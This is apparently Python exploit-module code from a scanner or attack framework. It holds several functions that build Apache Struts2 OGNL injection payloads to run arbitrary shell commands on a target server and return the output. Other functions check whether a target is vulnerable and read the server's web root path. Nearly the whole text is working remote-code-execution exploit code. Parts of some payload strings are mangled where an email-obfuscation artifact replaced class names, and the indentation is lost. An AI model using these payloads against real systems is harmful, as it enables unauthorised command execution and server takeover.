def executecmd(self, command):
payload = "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + command + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"
commandurl = "{}/?{}={}".format(self.url, self.param, quote(payload))
s = session()
try:
r = s.get(commandurl, timeout=5)
resp = r.text.encode("utf-8")
return resp
except:
return False
def executecmd(self, cmd):
exp = '''{}/memoindex.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.EXP.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd={}'''
url = exp.format(self.url, cmd)
s = session()
try:
r = s.get(url, timeout=5)
res = r.text.encode("utf-8")
return res
except Exception as e:
self.report('connect error {}'.format(e), Level.error)
return False
def executecmd(self, cmd):
cmdexp = "/?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context" \
"[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lan" \
"g.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpso" \
"bj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command={}"
commandurl = self.url + cmdexp.format(cmd)
s = session()
try:
r = s.get(commandurl, timeout=5)
resp = r.text.encode("utf-8")
return resp
except:
return False
def executecmd(self, command):
poc = "(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true," \
"%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties']," \
"%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess" \
"['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true," \
"@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('{}').getInputStream()))".format(command)
commandurl = self.url + poc
s = session()
try:
r = s.get(commandurl, timeout=5)
resp = r.text.encode("utf-8")
return resp
except:
return False
def executecmd(self, cmd):
cmdexp = "/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parame" \
"ters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Run" \
"time@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23" \
"wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServ" \
"letResponse&content=16456&command={}"
commandurl = self.url+cmdexp.format(cmd)
s = session()
try:
r = s.get(commandurl, timeout=5)
resp = r.text.encode("utf-8")
return resp
except:
return False
def executecmd(self, command):
poc = "/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution" \
"%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStati" \
"cMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%2" \
"9%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%2" \
"7{}%27%29.getInputStream%28%29%29%7D".format(command)
commandurl = self.url + poc
s = session()
try:
r = s.get(commandurl, timeout=5)
resp = r.text.encode("utf-8")
return resp
except:
return False
def ifpoc(self):
poc = '''{}/memoindex.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086'''
url = poc.format(self.url)
s = session()
try:
r = s.get(url, timeout=5)
resp = r.text.encode("utf-8")
if resp == '1008660253718':
return True
else:
return False
except Exception as e:
self.report('url connect error {}'.format(e), Level.error)
return False
def getwebpath(self):
webpath = "/%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts" \
"2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWri" \
"ter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23w" \
"r.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f"
pathurl = self.url + webpath
s = session()
try:
res = s.get(pathurl, timeout=5)
if res.status_code == 200:
filepath = res.text.encode('utf-8')
return filepath
except Exception as err:
self.report("Fail to get web file path {}".format(pathurl))
return False
def pocurl(self):
poc = "/%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23param" \
"eters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.clos" \
"e()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323" \
"B453885F5181F1B624D0B"
poc_url = self.url + poc
s = session()
try:
res = s.post(poc_url, timeout=4)
if res.status_code == 200 and "25F9E794323B453885F5181F1B624D0B" in res.content:
if len(res.content) < 40: # 34 length
return True
else:
return False
else:
return False
except Exception as e:
self.report("Failed to connection {}".format(poc_url), Level.error)
return False